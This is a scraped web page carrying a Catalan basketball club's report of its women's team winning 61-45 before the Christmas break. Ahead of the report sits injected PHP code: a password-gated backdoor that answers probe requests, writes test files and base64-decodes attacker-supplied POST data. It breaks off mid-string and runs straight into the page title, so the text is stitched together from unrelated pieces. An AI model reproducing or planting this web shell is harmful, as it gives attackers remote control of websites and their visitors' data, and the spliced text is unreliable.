function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria vital pel TGN abans de l'aturada de Nadal! (61-45) - Tgn Bàsquet Club -

Victòria vital pel TGN abans de l’aturada de Nadal! (61-45)

Updated: desembre 17, 2023

Partit corresponent a la dotzena jornada de la nova competició de la FCBQ Supercopa Catalunya femenina, on el Sènior A ha jugat a l’Anella Olímpica davant del Joventut Les Corts, partit que s’ha disputat després de la presentació dels equips del club per aquesta temporada 23/24.

El TGN ha dominat el partit de principi a fi. Les jugadores d’Israel Esteve han sortit per feina, completant un parcial de 12-0 en els primers 4 minuts de partit, obligant a les visitants a demanar temps mort. A partir d’aquest moment, l’avantatge del conjunt lila s’ha mantingut entorn als 10 punts durant tota la primera meitat (29-22 al descans).

Al descans, uns problemes tècnics amb els marcadors de les cistelles ha fet que el partit s’aturés una bona estona, i això ha refredat a les locals, que han vist com el Joventut Les Corts retallava diferències a la represa (39-35 al final del 3r quart). Tot i així, el TGN no ha col·lapsat i la gran actuació d’Alba Farell a l’últim periode, anotant 14 dels seus 21 punts en els primers minuts del quart (4 triples i una cistella de 2), han segellat la victòria per un TGN Bàsquet que torna a agafar aire i es situa en 8a posició amb un balanç de 6v-6d.

A la propera jornada, després de la parada de Nadal, el TGN visitarà la pista del SESE el dissabte 13 de gener a les 17:45h.